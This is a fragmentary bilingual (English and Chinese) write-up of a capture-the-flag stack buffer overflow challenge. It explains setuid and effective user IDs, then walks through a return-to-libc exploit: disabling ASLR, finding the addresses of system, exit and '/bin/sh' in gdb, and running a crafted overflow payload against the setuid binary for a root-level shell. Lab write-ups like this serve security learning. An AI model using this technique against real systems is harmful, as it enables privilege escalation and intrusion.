ELF x86 - Stack buffer overflow basic 6
ELF x86 - Stack buffer overflow basic 6
return to libc
1 |
setuid & setgid
When the** setuid or setgid attributes are set on an executable file, then any users able to **execute the file will automatically execute the file with the privileges of the file’s owner (commonly root) and/or the file’s group, depending upon the flags set
The setuid and setgid bits are normally set with the command chmod by setting the high-order octal digit to 4 for setuid or 2 for setgid. “chmod 6711 file” will set both the setuid and setgid bits (4+2=6), making the file read/write/executable for the owner (7), and executable by the group (first 1) and others (second 1). When a user other than the owner executes the file,** the process will run with user and group permissions set upon it by its owner**. For example, if the file is owned by user root and group wheel, it will run as root:wheel no matter who executes the file.chmod +s
防御-降权 seteuid()
Normal approach followed by root setuid programs is to drop root privileges before getting input from the user. Thus even when user input is malicious, attacker wont get a root shell.
root setuid接收用户输入后,丢弃root权限
For** example below vulnerable code **wont allow the attacker to get a root shell.
seteuid(getuid()); /* Temporarily drop privileges */
sticky bit
When a directory’s sticky bit is set, the filesystem treats the files in such directories in a special way so only the file’s owner, the directory’s owner, or root user can rename or delete the file.
ls -l test
chmod +t test; ls -l test
setreuid(geteuid(), geteuid());
每个Linux进程都有有两个相关的用户ID:实际用户ID(即ruid)和有效用户ID(即euid),其中ruid表示了该进程由谁运行,即当前系统环境用户是谁,主要回答who am I?的问题;而euid则用来规范进程的实际权限控制。比如passwd文件存放了用户名和密码,当一个普通用户运行passwd时,其ruid是自己,而euid则临时变为了文件的所有者root。
geteuid()用来取得执行目前进程有效的用户识别码. 有效的用户识别码用来决定进程执行的权限, 借由此改变此值, 进程可以获得额外的权限. 倘若执行文件的setID 位已被设置, 该文件执行时, 其进程的euid值便会设成该文件所有者的uid. 例如, 执行文件/usr/bin/passwd 的权限为-r-s–x–x, 其s 位即为setID(SUID)位, 而当任何用户在执行passwd 时其有效的用户识别码会被设成passwd 所有者的uid 值, 即root 的uid 值(0).
app-systeme-ch13@challenge02:~$ ls -l ./ch13
-r-sr-x--- 1 app-systeme-ch13-cracked app-systeme-ch13 7360 May 19 2019 ./ch13
关闭ASLR 原来值是2
使用sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"
1 | //vuln.c |
r $(python2 -c "print 'A'*270")
溢出 64位下Invalid $PC address: 0x414141414141
gdb-peda$ r $(python -c "print 'a'*36")
Stopped reason: SIGSEGV
0x61616161 in ?? ()
gdb-peda$ print system
$2 = {<text variable, no debug info>} 0xb7e68310 <system>
gdb-peda$ print exit
$3 = {<text variable, no debug info>} 0xb7e5b260 <exit>
x/4000s $rsp
0xbffffef8: "SHELL=/bin/bash"
gdb-peda$ x/s 0xbffffef8+6
0xbffffefe: "/bin/bash"、x
将这三项连接在一起r $(python -c "print 'a'*32+'\x10\x83\xe6\xb7'+'\x60\xb2\xe5\xb7'+'\xfe\xfe\xff\xbf'")
1 | gdb-peda$ c |
(gdb) info proc map
1 | Start Addr End Addr Size Offset objfile |
gdb-peda$ searchmem "/bin/sh" 0xb7e27000 0xb7fd6000
Searching for '/bin/sh' in range: 0xb7e27000 - 0xb7fd6000
Found 1 results, display max 1 items:
libc.so.6 : 0xb7f8ad4c ("/bin/sh")
或者gdb-peda$ find "/bin/sh"
for exiting without segmentation fault, it’s necessary to replace the ‘DDDD’ with a valid address (e.g address to libc’s exit function).
1 | app-systeme-ch33@challenge02:~$ ./ch33 $(python -c "print 'a'*32+'\x10\x83\xe6\xb7'+'AAAA'+'\x4c\xad\xf8\xb7'") |
used to point to/bin/bash
on most GNU/Linux systems.
查看布局的另一种方法maintenance info sections ALLOBJ
Object file: /lib/x86_64-linux-gnu/libc.so.6
[0] 0x7ffff7de42e0->0x7ffff7de4304 at 0x000002e0: .note.gnu.build-id ALLOC LOAD READONLY DATA HAS_CONTENTS
[1] 0x7ffff7de4304->0x7ffff7de4324 at 0x00000304: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS
[2] 0x7ffff7de4328->0x7ffff7de781c at 0x00000328: .hash ALLOC LOAD READONLY DATA HAS_CONTENTS
[3] 0x7ffff7de7820->0x7ffff7deb4d4 at 0x00003820: .gnu.hash ALLOC LOAD READONLY DATA HAS_CONTENTS
[4] 0x7ffff7deb4d8->0x7ffff7df9308 at 0x000074d8: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS
[5] 0x7ffff7df9308->0x7ffff7dff3c9 at 0x00015308: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS